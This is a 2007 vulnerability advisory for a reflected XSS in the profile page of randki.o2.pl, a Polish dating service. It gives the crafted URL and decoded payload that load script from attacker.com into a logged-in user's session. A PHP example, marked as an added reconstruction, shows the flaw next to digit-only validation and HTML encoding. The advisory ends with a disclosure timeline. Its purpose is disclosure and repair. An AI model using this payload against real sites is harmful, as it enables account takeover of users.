+ Subject:
XSS bug for randki.o2.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ randki.o2.pl Description:
randki.o2.pl is a dating service, part of o2.pl, the most famous Polish web portal.
+ Description:
XSS IN:
http://randki.o2.pl/profil.php?id_r=946245%22%3E%3Cscript/XSS%20SRC=http://attacker.com/xss.js%3E%3C/SCRIPT%3E
The sent data:
"><script/XSS SRC=http://attacker.com/xss.js></SCRIPT>
This makes it possible to take over a user's account on the dating service at http://randki.o2.pl when a logged-in user clicks a specially crafted URL.
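The payload opens with `">`, which suggests id_r is echoed unencoded into a double-quoted HTML attribute. The example below is added here and is not code from the advisory or from o2.pl: the hidden-input template and all function names are assumptions, and it shows that pattern beside a hardened version, fed with the URL above.

```php
<?php
// Added illustration. The real profil.php source is not available, so the
// hidden-input template below is an ASSUMED reconstruction of the sink.

// URL as published in the advisory.
$url = 'http://randki.o2.pl/profil.php?id_r=946245%22%3E%3Cscript/XSS%20SRC=http://attacker.com/xss.js%3E%3C/SCRIPT%3E';

// Decode the query string the same way PHP populates $_GET.
parse_str(parse_url($url, PHP_URL_QUERY), $query);
$idRaw = $query['id_r'];

// Vulnerable pattern: request data concatenated into a quoted attribute.
// The leading "> in the value closes the attribute and the tag.
function render_vulnerable(string $id): string {
    return '<input type="hidden" name="id_r" value="' . $id . '">';
}

// Fix 1 (input validation): a profile id is numeric, so accept digits only.
// Returns null for anything else; the caller should answer with HTTP 400.
function parse_profile_id(string $id): ?int {
    return (ctype_digit($id) && strlen($id) <= 9) ? (int) $id : null;
}

// Fix 2 (output encoding): encode for the HTML attribute context at the
// point of output, even if the value was validated earlier.
function render_hardened(string $id): string {
    $safe = htmlspecialchars($id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="hidden" name="id_r" value="' . $safe . '">';
}

echo "vulnerable: ", render_vulnerable($idRaw), "\n";
echo "hardened:   ", render_hardened($idRaw), "\n";

// Validation result for the advisory payload and for a plain numeric id.
foreach ([$idRaw, '946245'] as $candidate) {
    $id = parse_profile_id($candidate);
    echo ($id === null ? "rejected" : "accepted as $id"), "\n";
}
```

Both fixes belong together: validation rejects the request early, and output encoding still protects any other place where the value is printed.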
+ Timeline:
2007.03.04 bug discovered
2007.03.05 "/" bug sent via http://kontakt.o2.pl/
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-randki.o2.pl.php